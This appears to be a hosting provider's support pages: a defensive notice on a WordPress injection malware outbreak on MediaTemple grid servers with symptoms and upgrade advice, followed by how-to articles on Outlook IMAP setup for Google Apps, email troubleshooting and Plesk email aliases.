We’ll use this page to detail all information regarding the WordPress Injection Exploit, Malware which is infecting MediaTemple servers (and possibly other hosts as well – Please let us know if you are on another host).

MediaTemple claims this to be an “application-level” exploit (e.g. WordPress, Drupal, or other app), however all domains on our grid server account have been compromised while none (0) domains on our dedicated virtual accounts have been compromised. We believe it to be both a WordPress 2.9 vulnerability as well as a vulnerability in MediaTemple’s Grid Server Accounts. We believe the virus to be crawling the entire grid server, looking for “scripts” directories, and injecting code into javascript files, and creating php files.

You Are Infected When

You have new admin users in your WordPress control panel. (e.g. “JohnnyA” or “JohnnyB” or “amin”) whom you did not create
Extra code inserted into the head of your javascript files “scripts” directory (e.g. jquery-min.js)
You get a virus alert message when visiting your website.

Description

From what we can tell: The virus exploits an older version of WordPress (prior to 3.01), and injects code into javascript files, php files, and even wordpress posts which then download viruses to the visitor’s computer. These virus’ have been known to seriously damage users computers.

Protecting Yourself

The good news is – if you are running an updated virus protection suite (including AVG or Avast (both free)), it will block the virus. If you are not, please – update or install virus protection asap.

Also, if you are not running the latest version of WordPress, we will need to upgrade it soon. The latest version of WordPress addresses and fixes this exploit.

Setup Outlook 2007 for IMAP Access to Google Apps

Configure IMAP access in Outlook 2007

Follow the instructions below to set up IMAP access in Outlook 2007.

How to do it

Open Outlook.
For new setups, select Do not upgrade.
Click Yes.
Enter your display name, full Google Apps mail address (including ‘@your-domain.com’), and password.
Select the ‘Manually configure server settings or additional server types’ checkbox.

Select Internet E-mail.
Settings: name, full Google Apps mail address (including ‘@your_domain.com’)
- In the Account Type dropdown menu, select IMAP; enter the incoming and outgoing server names shown below.
- In the ‘User Name’ field, give your full Gmail address, including ‘@your_domain.com.’
- After creating these settings, clicking Next takes you to the end of the setup.
In the Tools menu, select Options then Mail Setup. Under ‘Email Accounts,’ click E-mail Accounts.
Select an account, and click Change above the list of accounts. Click More Settings, then the Advanced tab.
- Incoming server must be 993, and must use SSL encryption.
- Outgoing server can use 587, TLS encryption.
Click the Outgoing Server tab. Make sure that ‘My outgoing server (SMTP) requires authentication’ is selected. The radio button ‘Use same settings as my incoming mail server’ should also be selected.

Click OK > Next > Finish > Close > OK.
Check our recommended client settings, and adjust your client’s settings as needed.

Setup Outlook 2003 for IMAP Access to Google Apps

Configure IMAP access in Outlook 2003

Follow the instructions below to set up IMAP access in Outlook 2003.

Enable IMAP in your Google mail account. Don’t forget to click Save Changes when you’re done.
Open Outlook.
Click the Tools menu, and select E-mail Accounts…
Click Add a new e-mail account, then click Next.
Choose IMAP as your server type by clicking the radio button, and click Next.
Fill in all necessary fields to include the following information:

User Information
Your Name: Enter your name as you would like it to appear in the From: field of outgoing messages.
Email Address: Enter your full email address (username@your_domain.com)Server Information
Incoming mail server (IMAP): imap.gmail.com
Outgoing mail server (SMTP): smtp.gmail.com

Login Information
User Name: Enter your full email address (including @gmail.com or @your_domain.com)
Password: Enter your Google Apps password.
Click More Settings… and then click the Outgoing Server tab.
Check the box next to ‘My outgoing server (SMTP) requires authentication’ and select Use same settings as my incoming mail server.
Click the Advanced tab, and check the box next to ‘This server requires an encrypted connection (SSL)’ under Incoming Server (IMAP).
Check the box next to ‘This server requires an encrypted connection (SSL)’ under Outgoing Server (SMTP), and enter 465 in the Outgoing server (SMTP) box.
Click OK.
Click Test Account Settings… After receiving the message ‘Congratulations! All tests completed successfully’, click Close.
Click Next, and then click Finish.
Download the latest updates for Outlook from Microsoft. This will help prevent the most common Outlook errors that Gmail users see.
Check our recommended client settings, and adjust your client’s settings as needed.

Trouble Sending Email?

This document will walk you through some common issues encountered when sending email: including how to circumvent them, and prevent them in the future.

Email Isn’t Sent or Received

If you are getting send/receive errors, do the following:

Login to your webmail to verify that you can send & receive:
Access webmail.(yourwebsite).com in your web browser
login with your email information
Click the “Inbox” at the left
Attempt to “Compose” a new message and send

If this does NOT work, please contact us. If this does work, the problem is with your local setup, please delete or repair your existing setup in outlook (or other email client). If this is your first email account, you will need to setup an email account on the server first (using Plesk).

Email Is Received But Not Sent

First, verify that your outgoing mail server connection information is correct. This will vary depending on your mail client. For Outlook 2003:

Goto Tools -> Email Accounts -> View or Change Existing Accounts -> Select the appropriate account and “Change” button.
Verify the settings are correct based on the email setup tutorial for your client. (E.g. Setting up email in Outlook 2003)

If this is correct, and the email is still not going through, sometimes your ISP (e.g. Verizon Fios, Comcast) will block outgoing mail on port 25, so you will need to change your outgoing server port to 587:

Email Sent to Earthlink Address or AT&T Address is Bouncing Back

By default, Earthlink & AT&T block incoming email unless it is from a list of their choosing. If you find you are being blocked by these email addresses, please forward the bounce back email to support@gobdg.com and we will contact their support teams to remove this block.

Mass Email is Bouncing Back

In general mass email cannot be sent using regular email clients (e.g. Outlook). Most providers including hotmail, aol, yahoo, and a host of proprietary email providers will block any email that has more than 100 recipients. Also, many providers will limit the email size as well to 10mb.

How to Setup an Email Alias in Plesk

Setting up an Email Alias

This tutorial will show you how to create an email alias – or one email address that always simply forwards to another (e.g. info@johndoe.com which always forwards to john@johndoe.com).

To begin, you will need to have your main (john@johndoe.com) email address setup. See the article How to email accounts in Plesk.

Login to your Plesk Server Account.
Click on the “Home” link in the box at the top left.
Scroll down until you see your domain name and click it.
Click the “Mail” Icon (in the Services section)
Click on the email address that you would like to create an alias for (this is the destination address – john@johndoe.com).
Click on “Add New Email Alias”
Enter the alias address (address that mail will be redirected from e.g. “info@johndoe.com”).
Click Ok

Wham! You’re done congrats, take a break, relax, in fact take the afternoon off, you deserve it.
